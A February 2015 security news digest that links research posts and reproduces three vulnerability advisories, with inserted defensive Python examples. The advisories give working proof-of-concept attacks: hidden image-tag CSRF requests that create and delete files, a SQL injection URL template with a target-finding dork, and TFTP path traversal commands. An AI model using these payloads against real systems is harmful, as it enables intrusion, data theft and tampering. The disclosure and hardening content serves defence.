Channel: BOT24

Dridex – Password Bypass, Extracting Macros, and Rot13

When attackers decide to password protect something, it can be very frustrating as an analyst, because we are often left with few options to find out what they are protecting. If this happens, we can always try to straight up brute force the password, but unless the attackers use something like 1q2w3e4r, we’re up a creek without an oar. If it’s an MD5 hash of a password, we have many more options to crack it. In the case of xls files, we have the option to essentially “wipe out” the password and give it our own password. In a recent wave of Dridex phishing emails, this is what we saw

More here: http://phishme.com/dridex-password-bypass-extracting-macros-and-rot13/

Extend Sulo to find the CVE of Flash exploits

In this blog post, I would like to discuss detecting the vulnerability triggered by a particular exploit using Sulo. I have extended it to detect a few of the recent vulnerabilities. I have added code to detect CVE-2015-0310, CVE-2015-0311 and CVE-2015-0313. This is useful to security researchers who analyze Flash exploits. Yes, you can find those by parsing the output that Sulo produces, but many times the exploit crashes the IE process before we get any interesting logs, or the log file is too big and time-consuming to analyze. I am sure we can extend it to detect a few more vulnerabilities that are used in exploit kits. It will reduce the time needed to analyze (and identify the CVE of) an exploit sample. I have seen cases where a single Flash exploit exploits various vulnerabilities; in that case we will detect only one CVE, so we definitely need manual analysis there.

More here: https://hiddencodes.wordpress.com/2015/02/25/extend-sulo-to-find-the-cve-of-flash-exploits/

My Favorite PowerShell Post-Exploitation Tools

PowerShell became a key part of my red team toolkit in 2014. Cobalt Strike 2.1 added PowerShell support to the Beacon payload and this has made an amazing library of capability available to my users. In this post, I’d like to take you through a few of my favorite collections of PowerShell scripts.

More here: http://blog.cobaltstrike.com/2015/02/25/my-favorite-powershell-post-exploitation-tools/

Adventures in LDAP Injection: Exploiting and Fixing

Every pen tester looks forward to that next encounter that includes one of those uncommon vulnerabilities that ultimately result in an exciting session of exploration and learning.  During a recent web penetration test I ran across one of these rare gems when I started seeing some odd behavior on a forgot password form.  In this case I was fortunate to be working virtually across the table from a development team member who could verify our hypotheses by reading through the code.

More here: http://blog.secureideas.com/2015/02/adventures-in-ldap-injection-exploiting.html

DDoS-for-Hire Preys Upon SaaS Apps such as Joomla

Akamai’s Prolexic Security Engineering & Research Team (PLXsert) and PhishLabs’ (R.A.I.D.) Research Analysis and Intelligence Division have worked together on a threat advisory that warns enterprises and Software-as-a-Service (SaaS) providers about new distributed denial of service (DDoS) attacks that leverage Joomla servers that have a vulnerable Google Maps plugin installed. The advisory is available for download from: www.stateoftheinternet.com/joomla-reflection. 

Malicious PNGs: What You See Is Not All You Get!

Threat actors are continually evolving their techniques. One of the latest Graftor variants is delivering a Malware DLL via a PNG file delivery mechanism. Graftor basically indicates some type of trojan hiding in a piece of software. Hiding executables and DLLs in PNG files is yet another attempt to avoid detection and deliver malicious content to user systems. In this instance, the malicious content is placed at the end of the real PNG file data.

More here: http://blogs.cisco.com/security/talos/malicious-pngs

Bootkit Disk Forensics - Part 1

Recently I got the idea to play around with bypassing bootkit disk filters from an email I received, which highlighted that my MBR spoofing code was able to get underneath the driver of a popular forensics tool, preventing it from reading the real disk sectors. Although I believe disk forensics should not be done on a live system (instead, the disk should be mounted on a clean system and examined from there), I thought it would be fun to write a tool for bypassing various bootkit drivers and then post my research. Another email I received requested that I show how one would detect the presence of such filters from WinDbg, so I will try to cover both.

More here: http://www.malwaretech.com/2015/02/bootkit-disk-forensics-part-1.html

[Exploit] Seagate BlackArmor Network Storage System

The Seagate BlackArmor network storage system is susceptible to a root command injection vulnerability, which allows an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that when executed, grants an attacker full administrative control of the affected system.

More here: http://infosec42.blogspot.de/2015/02/exploit-seagate-blackarmor-network.html

Prohibiting RC4 Cipher Suites

If you’ve been following the drafts of this RFC, then nothing here will surprise you. The first draft was published on July 21, 2014, and, a short seven months later, RFC 7465 has been published. It’s a great idea for an RFC that I’d like to see used more frequently, but more on that in a moment.

More here: http://www.tripwire.com/state-of-security/security-awareness/prohibiting-rc4-cipher-suites/

Webnic Registrar Blamed for Hijack of Lenovo, Google Domains

Two days ago, attackers allegedly associated with the fame-seeking group Lizard Squad briefly hijacked Google’s Vietnam domain (google.com.vn). On Wednesday, Lenovo.com was similarly attacked. Sources now tell KrebsOnSecurity that both hijacks were possible because the attackers seized control over Webnic.cc, the Malaysian registrar that serves both domains and 600,000 others.

More here: http://krebsonsecurity.com/2015/02/webnic-registrar-blamed-for-hijack-of-lenovo-google-domains/

Paper: Kizzle: A Signature Compiler for Exploit Kits

In recent years, the drive-by malware space has undergone significant consolidation. Today, the most common source of drive-by downloads are the so-called exploit kits. Exploit kits signify a drastic consolidation of the process of malware creation and delivery. Exploit kit authors are often significantly more skillful and better financially motivated than an average “standalone” JavaScript malware author. This paper presents Kizzle, the first prevention technique specifically designed for finding exploit kits.

More here: http://research.microsoft.com/pubs/240495/tr.pdf

YSO-Mobile-Security-Framework

YSO Mobile Security Framework is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. We've been depending on multiple tools to carry out reversing, decoding, debugging, code review, and pen-test and this process requires a lot of effort and time. YSO Mobile Security Framework can be used for effective and fast security analysis of Android APK/Android app source code/iOS app source code.

More here: https://github.com/ajinabraham/YSO-Mobile-Security-Framework

D-Link and TRENDnet 'ncc2' service - multiple vulnerabilities

Local network; unauthenticated access.
Remote network; unauthenticated access*.
Remote network; 'drive-by' via CSRF.

More here: https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2

phpcodz

This project analyzes PHP security vulnerabilities.

More here: https://github.com/80vul/phpcodz

The Enemy on your Phone

Many people believe that there are no malware programs on smartphones. There was a time when there was some truth in this. A few years ago mobile platform operators originally designed their products with very high security levels. Mobile operating systems did not allow malicious programs to easily seize control and make themselves at home on devices.

Sadly that's no longer the case.

More here: https://securelist.com/analysis/publications/68916/the-enemy-on-your-phone/

Wireless File Transfer Pro Android - Multiple CSRF Vulnerabilities

Document Title:
===============
Wireless File Transfer Pro Android - CSRF Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1437


Release Date:
=============
2015-02-25


Vulnerability Laboratory ID (VL-ID):
====================================
1437


Common Vulnerability Scoring System:
====================================
2.3


Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer.

(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple cross site request forgery web vulnerabilities in the Wireless File Transfer Pro v1.0.1 mobile android application.


Vulnerability Disclosure Timeline:
==================================
2015-02-25:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Lextel Technology
Product: Wireless File Transfer Pro - (Android) Web Application UI 5.9.5 - 1.0.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple cross site request forgery issues have been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web application.
The mobile web application is vulnerable to a combination of cross site request forgery and local command injection attacks.


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers without a privileged application user account and with medium user interaction.
For a security demonstration or to reproduce the vulnerability, follow the information and steps below.

Create New Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4

<a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">


Delete File, Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30

Reference:
http://localhost:8888/
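The two PoCs above work because fileExplorer.html performs create and delete on a bare GET, which is exactly what an image tag on any third-party page makes the victim's browser send. The check below is an added example of the request-side policy that closes this (it is not the vendor's code); the token header name, the session token value and the sample requests are assumptions modelled on the session logs above.

```python
"""Request-side CSRF policy for the fileExplorer.html actions in the advisory
above (create / deleteFile).  Added example, not the vendor's code: the
token header name, session token and sample requests are assumed here."""
import hmac
from urllib.parse import parse_qs, urlsplit

STATE_CHANGING = {"create", "deleteFile"}   # actions from the advisory's PoCs
TOKEN_HEADER = "x-csrf-token"               # assumed header name


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query and headers."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    parts = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {"method": method, "path": parts.path, "query": query,
            "headers": headers, "body": body}


def reject_reason(req: dict, expected_host: str, session_token: str):
    """Return None if the request may proceed, otherwise why it is refused."""
    action = req["query"].get("action")
    if req["path"] != "/fileExplorer.html" or action not in STATE_CHANGING:
        return None                        # read-only or unrelated: no check
    # 1. A state-changing action must never be reachable through a bare GET,
    #    which is what an <img src=...> on a third-party page sends.
    if req["method"] != "POST":
        return "state-changing action sent as GET"
    # 2. The request must originate from the app's own origin.
    origin = req["headers"].get("origin") or req["headers"].get("referer")
    if not origin or urlsplit(origin).netloc != expected_host:
        return "missing or cross-site Origin/Referer"
    # 3. It must carry the per-session token a foreign page cannot read.
    token = req["headers"].get(TOKEN_HEADER, "")
    if not hmac.compare_digest(token, session_token):
        return "missing or wrong CSRF token"
    return None


def check(raw: str, expected_host="192.168.1.2:8888", session_token="tok-1234"):
    """Convenience wrapper: parse then apply the policy."""
    return reject_reason(parse_request(raw), expected_host, session_token)


# Constructed requests modelled on the advisory's session log.
POC_CREATE = ("GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1\r\n"
              "Host: 192.168.1.2:8888\r\n"
              "Referer: http://other-site.example/lure.html\r\n\r\n")
CROSS_SITE_POST = ("POST /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1\r\n"
                   "Host: 192.168.1.2:8888\r\n"
                   "Origin: http://other-site.example\r\n"
                   "X-CSRF-Token: tok-1234\r\n\r\n")
SAME_ORIGIN_POST = ("POST /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1\r\n"
                    "Host: 192.168.1.2:8888\r\n"
                    "Origin: http://192.168.1.2:8888\r\n"
                    "X-CSRF-Token: tok-1234\r\n\r\n")
BROWSE = ("GET /fileExplorer.html?action=brower&path=/sdcard HTTP/1.1\r\n"
          "Host: 192.168.1.2:8888\r\n\r\n")

if __name__ == "__main__":
    for name, raw in [("PoC create", POC_CREATE), ("cross-site POST", CROSS_SITE_POST),
                      ("same-origin POST", SAME_ORIGIN_POST), ("browse", BROWSE)]:
        print(f"{name:16}: {check(raw) or 'allowed'}")
```

The same three conditions, applied to a web-server access log, also make a usable detection rule: any create or deleteFile action arriving as GET, or with a Referer outside the device's own host, is a forgery attempt or a misconfigured client.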


Security Risk:
==============
The security risk of the cross site request forgery web vulnerability in the create and delete function is estimated as medium. (CVSS 2.3)


Credits & Authors:
==================
Hadji Samir [s-dz@hotmail.fr]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Data Source: Scopus CMS - SQL Injection Web Vulnerability

Document Title:
===============
Data Source: Scopus CMS - SQL Injection Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1436


Release Date:
=============
2015-02-25


Vulnerability Laboratory ID (VL-ID):
====================================
1436


Common Vulnerability Scoring System:
====================================
8.9


Abstract Advisory Information:
==============================
An independent security team of the Vulnerability Laboratory discovered a critical SQL injection web vulnerability in the official Data Source Scopus Content Management System.


Vulnerability Disclosure Timeline:
==================================
2015-02-25:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
A remote SQL injection web vulnerability has been discovered in the official Data Source Scopus Content Management System.
The vulnerability allows remote attackers to inject their own SQL commands to compromise the affected database management system.

The vulnerability is located in the `w` value of the `countrysearch.php` file. Remote attackers are able to compromise the
application and DBMS by manipulating the `w` value in the `countrysearch.php` file. The issue is a classic ORDER BY injection.
The request method used to inject commands is GET, and the issue is located on the application side of the service.

The security risk of the SQL injection vulnerability is estimated as critical with a CVSS (Common Vulnerability Scoring System) count of 8.9.
Exploitation of the remote SQL injection web vulnerability requires no user interaction or privileged web application user account.
Successful exploitation of the remote SQL injection results in DBMS, web server and web application compromise.

Request Method(s):
                                [+] GET

Vulnerable File(s):
                                [+] countrysearch.php

Vulnerable Parameter(s):
                                [+] w


Proof of Concept (PoC):
=======================
The remote SQL injection web vulnerability can be exploited by remote attackers without a privileged application user account or user interaction.
For a security demonstration or to reproduce the vulnerability, follow the information and steps below.

PoC: Example
http://[localhost]/[PATH]/[FILE].php?w=-[SQL INJECTION VULNERABILITY]'--

PoC: Demonstration
http://www.server.com/countrysearch.php?w=world%27-[SQL INJECTION VULNERABILITY]'--

Dork(s):
inurl:".php?w="


Solution - Fix & Patch:
=======================
The vulnerability can be patched by using a prepared statement together with secure encoding/parsing of the w value in the countrysearch.php file.
Restrict the w value input and filter it by disallowing special characters or negative values. Disable PHP script error output (e.g. `error_reporting(0);`).
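The fix above needs one caveat a practitioner will hit immediately: a prepared statement binds values, not identifiers, so a sort column taken from the client (the ORDER BY case the advisory names) cannot be parameterised and must instead be mapped through an allow-list. The following is an added example, not the Scopus CMS code; the countries table, its rows and the sortable column names are constructed here.

```python
"""Vulnerable vs. hardened handling of a `w` search value such as the one in
countrysearch.php.  Added example, not the Scopus CMS code: the table, rows
and the sortable column names are constructed here."""
import re
import sqlite3

# ORDER BY targets cannot be bound as parameters, so the only safe way to
# accept a client-chosen sort is an allow-list mapped to fixed column names.
ALLOWED_SORT = {"name": "name", "region": "region"}      # assumed columns
W_PATTERN = re.compile(r"[A-Za-z][A-Za-z -]{0,63}")      # advisory: no special chars


def make_db() -> sqlite3.Connection:
    """Constructed sample data; `secret` stands for a column users may not read."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE countries (name TEXT, region TEXT, secret TEXT)")
    conn.executemany("INSERT INTO countries VALUES (?, ?, ?)", [
        ("world", "all", "alpha"),
        ("france", "europe", "bb"),
        ("japan", "asia", "c"),
    ])
    return conn


def search_vulnerable(conn, w: str, sort: str = "name") -> list:
    """String-built query: both the value and the ORDER BY part are injectable."""
    sql = f"SELECT name FROM countries WHERE name = '{w}' ORDER BY {sort}"
    return [row[0] for row in conn.execute(sql)]


def search_hardened(conn, w: str, sort: str = "name") -> list:
    """Bound parameter for the value, allow-list lookup for the sort column."""
    if not W_PATTERN.fullmatch(w):
        raise ValueError("w contains characters outside the allowed set")
    column = ALLOWED_SORT.get(sort)
    if column is None:
        raise ValueError("unknown sort column")
    sql = f"SELECT name FROM countries WHERE name = ? ORDER BY {column}"
    return [row[0] for row in conn.execute(sql, (w,))]


def raises_value_error(fn, *args) -> bool:
    """True if fn(*args) is rejected with ValueError (used by the checks)."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "world"))                            # ['world']
    print(search_vulnerable(db, "x' OR '1'='1"))                     # every row
    print(search_vulnerable(db, "x' OR '1'='1", "length(secret)"))   # ordered by a hidden column
    print(search_hardened(db, "world"))                              # ['world']
    print(raises_value_error(search_hardened, db, "world", "length(secret)"))  # True
```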


Security Risk:
==============
The security risk of the remote sql injection web vulnerability in the countrysearch.php file is estimated as critical.


Credits & Authors:
==================
[GuardIran Security Team] P0!s0nC0d3 - (http://www.guardiran.org)



DSS TFTP 1.0 Server - Path Traversal Vulnerability

Document Title:
===============
DSS TFTP 1.0 Server - Path Traversal Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1440


Release Date:
=============
2015-02-26


Vulnerability Laboratory ID (VL-ID):
====================================
1440


Common Vulnerability Scoring System:
====================================
6.2


Product & Service Introduction:
===============================
DSS TFTP 1.0 Server is a simple TFTP server that allows basic file transfers.

(Download: http://www.kndata.com/downloads/ )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a path traversal vulnerability in the official DSS TFTP 1.0 Server software.


Vulnerability Disclosure Timeline:
==================================
2015-02-26:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
DSS TFTP 1.0 Server is a simple TFTP server that allows users to download/upload files through the TFTP service from/to a specified TFTP root directory.
However, the application is vulnerable to path traversal, which enables an attacker to download/upload files outside the TFTP root directory.


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without user interaction or a privileged application user account.
For a security demonstration or to reproduce the vulnerability, follow the information and steps below.

GET file from server
tftp -i 192.168.56.101 GET .../boot.ini

PUT file outside the tftp root directory
tftp -i 192.168.56.101 PUT exploit.exe .../exploit.exe
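The missing control is a confinement check on the final path the server opens. The PoC's three-dot spelling can only reach the parent directory if the server rewrites the name before opening it, so the check has to run on the canonical path after any such rewriting, not on whether the raw string contains `..`. The following is an added example of that check, not the DSS TFTP code; the root directory is a temporary directory constructed here.

```python
"""Root-directory confinement for a TFTP server, the check the DSS TFTP 1.0
PoC above shows is missing.  Added example, not the DSS code: the root is a
temporary directory constructed here."""
import os
import tempfile


class PathTraversal(ValueError):
    """Raised when a client-supplied name would leave the TFTP root."""


def resolve_in_root(root: str, requested: str) -> str:
    """Map a client-supplied TFTP filename to an absolute path inside root.

    The decision is made on the canonical path, not on the spelling of the
    request, so it must run after any name decoding the server performs.
    """
    root = os.path.realpath(root)
    name = requested.replace("\\", "/")          # Windows clients send backslashes
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        raise PathTraversal(f"absolute path refused: {requested!r}")
    # realpath resolves '..' and symlinks, so a link inside root that points
    # outside it is caught by the same comparison below.
    candidate = os.path.realpath(os.path.join(root, name))
    # commonpath (not a string prefix test) so that a sibling directory such
    # as root + "2" is not mistaken for a location inside root.
    if os.path.commonpath([root, candidate]) != root:
        raise PathTraversal(f"escapes TFTP root: {requested!r}")
    return candidate


def allowed(root: str, requested: str) -> bool:
    """True if the name stays inside root (convenience wrapper for checks)."""
    try:
        resolve_in_root(root, requested)
    except PathTraversal:
        return False
    return True


# Constructed root directory for demonstration.
ROOT = tempfile.mkdtemp(prefix="tftproot-")

if __name__ == "__main__":
    for name in ["boot.ini", "sub/../ok.txt", "../boot.ini", "..\\boot.ini",
                 "/etc/passwd", "sub/../../x"]:
        print(f"{name!r:18} -> {'allowed' if allowed(ROOT, name) else 'REFUSED'}")
```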


Security Risk:
==============
The security risk of the path traversal software vulnerability is estimated as high. (CVSS 6.2)


Credits & Authors:
==================
lucyoa



GDB 'exploitable' plugin

'exploitable' is a GDB extension that classifies Linux application bugs by severity. The extension inspects the state of a Linux application that has crashed and outputs a summary of how difficult it might be for an attacker to exploit the underlying software bug to gain control of the system. The extension can be used to prioritize bugs for software developers so that they can address the most severe ones first.

More here: https://github.com/jfoote/exploitable

Paper: Security in VANETs

Abstract:
Vehicular Ad-hoc Networks (VANETs) are gaining growing interest and research effort over recent years because they offer enhanced safety and enriched travel comfort. However, security concerns that are either generally seen in ad-hoc networks or unique to VANETs present great challenges. This paper surveys recent advances in research that aim to strengthen security from an architectural and systematic approach. Proposals on specific security issues are also presented and their key results summarized.

More here: http://www.cse.wustl.edu/~jain/cse571-14/ftp/vanet_security.pdf